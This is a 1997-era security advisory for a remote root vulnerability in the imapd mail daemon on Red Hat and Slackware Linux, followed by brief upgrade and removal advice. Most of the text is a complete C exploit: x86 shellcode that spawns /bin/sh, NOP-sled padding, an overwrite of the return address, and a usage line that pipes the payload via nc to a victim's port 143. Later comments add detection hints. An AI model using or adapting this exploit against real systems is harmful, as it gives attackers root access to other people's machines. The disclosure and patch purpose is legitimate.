COMMAND

    imapd

SYSTEMS AFFECTED

    Linux (RedHat), Slackware 3.2

PROBLEM

    Linux systems running the imapd server daemon can be remotely
    exploited in a way that lets an attacker gain root access to the
    system, for example by changing the root password field to blank.
    An exploit for RedHat follows.  Slackware installs imap if you
    choose to install the pine/pico package.

    /*
     * IMAPd   Linux/intel  remote   xploit  by    savage@apostols.org
     * 1997-April-05
     * Workz fine against RedHat and imapd distributed with pine
     * Special  THANKS to:  b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and  the
     * rest of ToXyn !!!
     * usage:
     *     $ (imap 0; cat) | nc victim 143
     *             |
     *             +--> usually from -1000 to 1000 ( try in steps of  100 )
     *             [ I try 0, 100 and 200 - so1o ]
     */

    #include <stdio.h>

    /*
     * Payload sent as the IMAP username: a long run of 0x90 (x86 NOP)
     * bytes, then what appears to be x86 machine code (the \xcd\x80
     * sequences are `int 0x80` system calls), ending in the string
     * "/bin/sh".  The NOP run makes the exact landing address less
     * critical; for a defender, a LOGIN argument consisting mostly of
     * 0x90 bytes is the recognisable part of this traffic.
     */
    char shell[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
    "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
    "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\xe8\xc0\xff\xff\xff/bin/sh";

    /*
     * Buffer holding the over-long username.  1024+255 bytes is
     * presumably the size of imapd's own buffer plus the room needed
     * to overwrite what follows it -- confirm against the affected
     * imapd source.
     */
    char username[1024+255];

    /*
     * Builds the malformed username and prints one IMAP LOGIN command
     * to stdout.  Nothing here talks to the network itself.
     *
     * argv[1] (optional): signed offset added to the base address
     * below; defaults to 0 when absent.
     *
     * Note: `void main` is non-standard C, and atoi/strcpy/strlen are
     * used without <stdlib.h>/<string.h> -- written against 1997-era
     * compilers that accepted implicit declarations.
     */
    void main(int argc, char *argv[]) {
            int i,a;
            long val;

            /* Address offset supplied by the caller (see usage above). */
            if(argc>1)
                    a=atoi(argv[1]);
            else
                    a=0;

            /* Payload goes at the start of the username. */
            strcpy(username,shell);

            /* Pad the rest of the buffer with NOPs.  This fills the
             * array to its last byte, so no terminator remains until
             * the explicit one written further down. */
            for(i=strlen(username);i<sizeof(username);i++)
                    username[i]=0x90; /* NOP */

            /* Base address plus offset.  0xbffff501 is in the range
             * where a Linux/x86 process stack of that era lived; the
             * exact value is a guess, hence the adjustable offset. */
            val = 0xbffff501 + a;

            /* From byte 1024 onward, write val repeatedly as a
             * little-endian 32-bit value.  This region is intended to
             * land on the saved return address of the overflowed
             * routine in imapd (assumed from the layout; confirm
             * against the vulnerable version).  For detection: a LOGIN
             * username of ~1.2 KB made of 0x90 bytes followed by the
             * same 4-byte word repeated is the tell-tale pattern. */
            for(i=1024;i<strlen(username)-4;i+=4)
            {
                    username[i+0] = val & 0x000000ff;
                    username[i+1] = (val & 0x0000ff00) >> 8;
                    username[i+2] = (val & 0x00ff0000) >> 16;
                    username[i+3] = (val & 0xff000000) >> 24;
            }

            /* Terminate so that %s below stops at the end of the array. */
            username[ sizeof(username)-1 ] = 0;

            /* Emit the LOGIN line; the IMAP tag is simply sizeof(shell). */
            printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
    }

SOLUTION

    Users of Red Hat 4.0 should apply the Red Hat 4.1 fix.  Users of
    previous releases of Red Hat Linux are strongly encouraged to
    upgrade or simply not run imap.  You can remove imap from any
    machine running Red Hat Linux 2.0 or later by running the command
    "rpm -e imap", which renders it immune to this problem.

    All of the  new packages are  PGP signed with  Red Hat's PGP  key,
    and may be obtained from ftp.redhat.com:/updates/4.1.

    Slackware users should upgrade their software.